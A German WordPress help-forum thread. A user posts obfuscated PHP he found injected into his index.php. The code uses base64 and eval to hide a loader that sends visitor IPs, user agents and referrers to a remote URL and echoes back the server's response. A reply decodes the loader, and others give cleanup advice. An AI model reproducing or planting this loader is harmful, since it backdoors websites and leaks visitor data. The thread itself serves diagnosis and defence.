Merkwürdiger Code in meiner index.php

  • Hallo!

    Heute bekam ich eine Fehlermeldung aus meiner index.php.
    Der code in meiner index.php (der nicht von mir stammt und auch vorher da nicht war) - was ist das? Ich habe ihn gelöscht und alles läuft wieder prima. Gruß Max

    <?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Wenn Du den Code nicht eingefügt hast und dieser auch nicht von einem Plugin kommt, dann liegt der Verdacht nahe, dass sich irgendjemand an Deiner Seite vergriffen hat... Würde grundsätzlich mal die WP-, Plugin- und Themedateien nach weiterer solcher Codes durchstöbern. Ist zwar aufwändig, aber sicher ist sicher.

    Möglich, dass die Seite gehacked wurde. Sicherheitshalber auch mal alle PW ändern (DB, FTP, WP).

  • Hi!

    Danke für die Antwort.
    Zuerst dachte ich, dass mit der Elemenierung der Codezeile in der index.php alles gut sei - war es aber nicht. Im Dashboard war die Hölle los. Ich musste die Seite also neu aufbauen.
    Ich werde nun einige Sicherheiststufen einbauen.

    Frage mich aber, wie man code verändern kann. Wie sind die in die Dateien gekommen???? Mein admin-Wort und das Paßwort waren nämlich kompliziert.


    Grüße

    Max

  • Ist BASE64 verschlüsselt.

    Das hier "Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85 Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+" ergibt

    PHP
    ?><?php $3rl = 'http://96.69e.a6e.o0/bt.php'; ?>



    Und das "JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF 9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVy ZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWC k7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=="

    Code
    $_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;



    Damit findest Du dann bei Google Suche dieses Document:

    http://www.esotech.org/resources/cms/…on-and-analysis

    der das Problem (auf englisch) beschreibt und auch, wie man es löst.

    Viel Erfolg!

  • Hi!

    danke für die Antwort und für die Lösung. Ich versteh das Problem - wie es bechrieben ist, schnalle aber nicht, was ich tun soll.

    Schon bei der ersten Zeile bin ich ratlos:

    The Solution

    Firstly, go to your main wordpress directory and type:
    # ls -al

    Was meint er damit? Wo soll ich das eingeben? Ich kenne solche Eingaben noch vom alten DOS. Aber wordpress liegt doch auf dem Server.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!